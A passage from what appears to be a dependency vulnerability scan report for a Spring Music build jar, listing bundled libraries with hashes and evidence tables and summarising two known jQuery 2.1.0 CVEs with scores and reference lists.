Evidence Type Source Name Value Confidence Vendor file name javax.annotation-api High Vendor jar package name annotation Highest Vendor jar package name javax Highest Vendor Manifest automatic-module-name java.annotation Medium Vendor Manifest bundle-docurl https://javaee.github.io/glassfish Low Vendor Manifest bundle-symbolicname javax.annotation-api Medium Vendor Manifest extension-name javax.annotation Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.annotation-api Low Vendor pom developer id ldemichiel Medium Vendor pom developer name Linda De Michiel Medium Vendor pom developer org Oracle Corp. Medium Vendor pom groupid javax.annotation Highest Vendor pom name API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://javaee.github.io/glassfish Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jcp.org/en/jsr/detail?id=250 Highest Product file name javax.annotation-api High Product jar package name annotation Highest Product jar package name javax Highest Product Manifest automatic-module-name java.annotation Medium Product Manifest bundle-docurl https://javaee.github.io/glassfish Low Product Manifest Bundle-Name javax.annotation API Medium Product Manifest bundle-symbolicname javax.annotation-api Medium Product Manifest extension-name javax.annotation Medium Product pom artifactid javax.annotation-api Highest Product pom developer id ldemichiel Low Product pom developer name Linda De Michiel Low Product pom developer org Oracle Corp. Low Product pom groupid javax.annotation Highest Product pom name API High Product pom organization name GlassFish Community Low Product pom organization url https://javaee.github.io/glassfish Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jcp.org/en/jsr/detail?id=250 Medium Version file version 1.3.2 High Version Manifest Bundle-Version 1.3.2 High Version Manifest Implementation-Version 1.3.2 High Version pom parent-version 1.3.2 Low Version pom version 1.3.2 Highest
spring-music-sqldb-1.0.jar: javax.transaction-api-1.2.jarDescription:
Project GlassFish Java Transaction API License:
CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/javax.transaction-api-1.2.jar
MD5: 2dfee184286530e726ad155816e15b4c
SHA1: d81aff979d603edd90dcd8db2abc1f4ce6479e3e
SHA256: 9528449583c34d9d63aa1d8d15069790f925ae1f27b33784773b8099eff4c9ff
Evidence Type Source Name Value Confidence Vendor file name javax.transaction-api High Vendor jar package name javax Highest Vendor jar package name transaction Highest Vendor Manifest bundle-docurl https://glassfish.java.net Low Vendor Manifest bundle-symbolicname javax.transaction-api Medium Vendor Manifest extension-name javax.transaction Medium Vendor Manifest Implementation-Vendor GlassFish Community High Vendor Manifest Implementation-Vendor-Id org.glassfish Medium Vendor Manifest specification-vendor Oracle Corporation Low Vendor pom artifactid javax.transaction-api Low Vendor pom developer id paul_parkinson Medium Vendor pom developer name Paul Parkinson Medium Vendor pom developer org Oracle, Inc. Medium Vendor pom groupid javax.transaction Highest Vendor pom name API High Vendor pom organization name GlassFish Community High Vendor pom organization url https://glassfish.java.net Medium Vendor pom parent-artifactid jvnet-parent Low Vendor pom parent-groupid net.java Medium Vendor pom url http://jta-spec.java.net Highest Product file name javax.transaction-api High Product jar package name javax Highest Product jar package name transaction Highest Product Manifest bundle-docurl https://glassfish.java.net Low Product Manifest Bundle-Name javax.transaction API Medium Product Manifest bundle-symbolicname javax.transaction-api Medium Product Manifest extension-name javax.transaction Medium Product pom artifactid javax.transaction-api Highest Product pom developer id paul_parkinson Low Product pom developer name Paul Parkinson Low Product pom developer org Oracle, Inc. Low Product pom groupid javax.transaction Highest Product pom name API High Product pom organization name GlassFish Community Low Product pom organization url https://glassfish.java.net Low Product pom parent-artifactid jvnet-parent Medium Product pom parent-groupid net.java Medium Product pom url http://jta-spec.java.net Medium Version file version 1.2 High Version Manifest Bundle-Version 1.2 High Version Manifest Implementation-Version 1.2 High Version pom parent-version 1.2 Low Version pom version 1.2 Highest
spring-music-sqldb-1.0.jar: jboss-logging-3.3.2.Final.jarDescription:
The JBoss Logging Framework License:
Apache License, version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jboss-logging-3.3.2.Final.jar
MD5: c397132f958d7e8ac0d566b6723ca7ca
SHA1: 3789d00e859632e6c6206adc0c71625559e6e3b0
SHA256: cb914bfe888da7d9162e965ac8b0d6f28f2f32eca944a00fbbf6dd3cf1aacc13
Evidence Type Source Name Value Confidence Vendor file name jboss-logging High Vendor hint analyzer vendor redhat Highest Vendor jar package name jboss Highest Vendor jar package name logging Highest Vendor Manifest automatic-module-name org.jboss.logging Medium Vendor Manifest build-timestamp Wed, 14 Feb 2018 13:23:27 -0800 Low Vendor Manifest bundle-docurl http://www.jboss.org Low Vendor Manifest bundle-symbolicname org.jboss.logging.jboss-logging Medium Vendor Manifest implementation-url http://www.jboss.org Low Vendor Manifest Implementation-Vendor JBoss by Red Hat High Vendor Manifest Implementation-Vendor-Id org.jboss.logging Medium Vendor Manifest os-arch amd64 Low Vendor Manifest os-name Linux Medium Vendor Manifest specification-vendor JBoss by Red Hat Low Vendor pom artifactid jboss-logging Low Vendor pom groupid org.jboss.logging Highest Vendor pom name JBoss Logging 3 High Vendor pom parent-artifactid jboss-parent Low Vendor pom parent-groupid org.jboss Medium Vendor pom url http://www.jboss.org Highest Product file name jboss-logging High Product jar package name jboss Highest Product jar package name logging Highest Product Manifest automatic-module-name org.jboss.logging Medium Product Manifest build-timestamp Wed, 14 Feb 2018 13:23:27 -0800 Low Product Manifest bundle-docurl http://www.jboss.org Low Product Manifest Bundle-Name JBoss Logging 3 Medium Product Manifest bundle-symbolicname org.jboss.logging.jboss-logging Medium Product Manifest Implementation-Title JBoss Logging 3 High Product Manifest implementation-url http://www.jboss.org Low Product Manifest os-arch amd64 Low Product Manifest os-name Linux Medium Product Manifest specification-title JBoss Logging 3 Medium Product pom artifactid jboss-logging Highest Product pom groupid org.jboss.logging Highest Product pom name JBoss Logging 3 High Product pom parent-artifactid jboss-parent Medium Product pom parent-groupid org.jboss Medium Product pom url http://www.jboss.org Medium Version Manifest Bundle-Version 3.3.2.Final High Version Manifest Implementation-Version 3.3.2.Final High Version pom parent-version 3.3.2.Final Low Version pom version 3.3.2.Final Highest
spring-music-sqldb-1.0.jar: jcip-annotations-1.0-1.jarDescription:
A clean room implementation of the JCIP Annotations based entirely on the specification provided by the javadocs.
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jcip-annotations-1.0-1.jar
MD5: d62dbfa8789378457ada685e2f614846
SHA1: ef31541dd28ae2cefdd17c7ebf352d93e9058c63
SHA256: 4fccff8382aafc589962c4edb262f6aa595e34f1e11e61057d1c6a96e8fc7323
Evidence Type Source Name Value Confidence Vendor file name jcip-annotations High Vendor jar package name annotations Highest Vendor jar package name annotations Low Vendor jar package name jcip Highest Vendor jar package name jcip Low Vendor jar package name net Low Vendor pom artifactid jcip-annotations Low Vendor pom developer id stephenc Medium Vendor pom developer name Stephen Connolly Medium Vendor pom groupid com.github.stephenc.jcip Highest Vendor pom name JCIP Annotations under Apache License High Vendor pom url http://stephenc.github.com/jcip-annotations Highest Product file name jcip-annotations High Product jar package name annotations Highest Product jar package name annotations Low Product jar package name jcip Highest Product jar package name jcip Low Product pom artifactid jcip-annotations Highest Product pom developer id stephenc Low Product pom developer name Stephen Connolly Low Product pom groupid com.github.stephenc.jcip Highest Product pom name JCIP Annotations under Apache License High Product pom url http://stephenc.github.com/jcip-annotations Medium Version pom version 1.0-1 Highest
spring-music-sqldb-1.0.jar: joda-time-2.9.9.jarDescription:
Date and time library to replace JDK date handling License:
Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/joda-time-2.9.9.jar
MD5: eca438c8cc2b1de38e28d884b7f15dbc
SHA1: f7b520c458572890807d143670c9b24f4de90897
SHA256: b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7
Evidence Type Source Name Value Confidence Vendor file name joda-time High Vendor jar package name joda Highest Vendor jar package name time Highest Vendor Manifest bundle-docurl http://www.joda.org/joda-time/ Low Vendor Manifest bundle-symbolicname joda-time Medium Vendor Manifest extension-name joda-time Medium Vendor Manifest implementation-url http://www.joda.org/joda-time/ Low Vendor Manifest Implementation-Vendor Joda.org High Vendor Manifest Implementation-Vendor-Id org.joda Medium Vendor Manifest specification-vendor Joda.org Low Vendor pom artifactid joda-time Low Vendor pom developer id broneill Medium Vendor pom developer id jodastephen Medium Vendor pom developer name Brian S O'Neill Medium Vendor pom developer name Stephen Colebourne Medium Vendor pom groupid joda-time Highest Vendor pom name Joda-Time High Vendor pom organization name Joda.org High Vendor pom organization url http://www.joda.org Medium Vendor pom url http://www.joda.org/joda-time/ Highest Product file name joda-time High Product jar package name joda Highest Product jar package name time Highest Product Manifest bundle-docurl http://www.joda.org/joda-time/ Low Product Manifest Bundle-Name Joda-Time Medium Product Manifest bundle-symbolicname joda-time Medium Product Manifest extension-name joda-time Medium Product Manifest Implementation-Title org.joda.time High Product Manifest implementation-url http://www.joda.org/joda-time/ Low Product Manifest specification-title Joda-Time Medium Product pom artifactid joda-time Highest Product pom developer id broneill Low Product pom developer id jodastephen Low Product pom developer name Brian S O'Neill Low Product pom developer name Stephen Colebourne Low Product pom groupid joda-time Highest Product pom name Joda-Time High Product pom organization name Joda.org Low Product pom organization url http://www.joda.org Low Product pom url http://www.joda.org/joda-time/ Medium Version file version 2.9.9 High Version Manifest Bundle-Version 2.9.9 High Version Manifest Implementation-Version 2.9.9 High Version pom version 2.9.9 Highest
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jarDescription:
WebJar for jQuery License:
MIT License: https://github.com/jquery/jquery/blob/master/MIT-LICENSE.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar
MD5: ba6a537302d2aaaa2d137531c4fc2456
SHA1: 0db1742ea52e14b25b7c4ab39d7a348324241567
SHA256: e97a279de4df230f480a81ac69a82c8aec73970ef152342f332fc2132fff1de1
Evidence Type Source Name Value Confidence Vendor file name jquery High Vendor pom artifactid jquery Low Vendor pom developer email james@jamesward.org Low Vendor pom developer id jamesward Medium Vendor pom developer name James Ward Medium Vendor pom groupid org.webjars Highest Vendor pom name jquery High Vendor pom url http://webjars.org Highest Product file name jquery High Product pom artifactid jquery Highest Product pom developer email james@jamesward.org Low Product pom developer id jamesward Low Product pom developer name James Ward Low Product pom groupid org.webjars Highest Product pom name jquery High Product pom url http://webjars.org Medium Version pom version 2.1.0-2 Highest
CVE-2019-11358 (OSSINDEX) suppress
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype.
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2019-11358 for details CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.099999904632568) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.webjars:jquery:2.1.0-2:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: jquery.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/jquery.jsMD5: 3177091fb9705dd978689ba11bf0609aSHA1: 0fe3e567e0776226ee98326ba8cae7680683c112SHA256: 0fa7752926a95e3ab6b5f67a21ef40628ce4447c81ddf4f6cacf663b6fb85af7
Evidence Type Source Name Value Confidence Vendor file name jquery High Product file name jquery High Version file version 2.1.0 High
CVE-2015-9251 suppress
jQuery before 3.0.0 is vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain Ajax request is performed without the dataType option, causing text/javascript responses to be executed. CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY,US_GOVERNMENT_RESOURCE cve@mitre.org - THIRD_PARTY_ADVISORY,VDB_ENTRY info - http://blog.jquery.com/2016/01/08/jquery-2-2-and-1-12-released/ info - http://research.insecurelabs.org/jquery/test/ info - https://bugs.jquery.com/ticket/11974 info - https://github.com/advisories/GHSA-rmxg-73gg-4p98 info - https://github.com/jquery/jquery/issues/2432 info - https://nvd.nist.gov/vuln/detail/CVE-2015-9251 Vulnerable Software & Versions (NVD):
cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions up to (excluding) 3.0.0 cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:agile_product_lifecycle_management_for_process:6.2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_process_management_suite:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_converged_application_server:*:*:*:*:*:*:*:* versions up to (excluding) 7.0.0.1 cpe:2.3:a:oracle:communications_interactive_session_recorder:6.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:*:*:*:*:*:*:*:* versions up to (excluding) 6.1.0.4.0 cpe:2.3:a:oracle:communications_webrtc_session_controller:*:*:*:*:*:*:*:* versions up to (excluding) 7.2 cpe:2.3:a:oracle:endeca_information_discovery_studio:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_manager_ops_center:12.3.3:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:enterprise_operations_monitor:4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 7.3.3; versions up to (including) 7.3.5 cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:* versions from (including) 8.0.0; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_asset_liability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_data_integration_hub:*:*:*:*:*:*:*:* versions from (including) 8.0.5; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_funds_transfer_pricing:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_liquidity_risk_management:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:*:*:*:*:*:*:*:* versions from (including) 8.0.2; versions up to (including) 8.0.7 cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_market_risk_measurement_and_management:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_profitability_management:*:*:*:*:*:*:*:* versions from (including) 8.0.4; versions up to (including) 8.0.6 cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_reconciliation_framework:8.0.6:*:*:*:*:*:*:* cpe:2.3:a:oracle:fusion_middleware_mapviewer:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_foundation:7.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_cruise_fleet_management:9.0.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_guest_access:4.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_materials_control:18.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:hospitality_reporting_and_analytics:9.1.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:insurance_insbridge_rating_and_underwriting:5.5:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:oss_support_tools:19.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.56:*:*:*:*:*:*:* cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.57:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:15.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:17.12:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:*:*:*:*:*:*:*:* versions from (including) 17.1; versions up to (including) 17.12 cpe:2.3:a:oracle:primavera_unifier:16.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:16.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_unifier:18.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:real-time_scheduler:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_allocation:15.0.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_customer_insights:16.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_invoice_matching:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_sales_audit:15.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.60.9:*:*:*:*:*:*:* cpe:2.3:a:oracle:retail_workforce_management_software:1.64.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:service_bus:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.10:*:*:*:*:*:*:* cpe:2.3:a:oracle:siebel_ui_framework:18.11:*:*:*:*:*:*:* cpe:2.3:a:oracle:utilities_framework:*:*:*:*:*:*:*:* versions from (including) 4.3.0.1; versions up to (including) 4.3.0.4 cpe:2.3:a:oracle:utilities_mobile_workforce_management:2.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3:*:*:*:*:*:*:* CVE-2019-11358 suppress
jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, ...) because of Object.prototype pollution. If an unsanitized source object contained an enumerable __proto__ property, it could extend the native Object.prototype. CWE-1321 Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')
CVSSv3:
Base Score: MEDIUM (6.1) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:P/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - BROKEN_LINK,THIRD_PARTY_ADVISORY,VDB_ENTRY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - ISSUE_TRACKING cve@mitre.org - 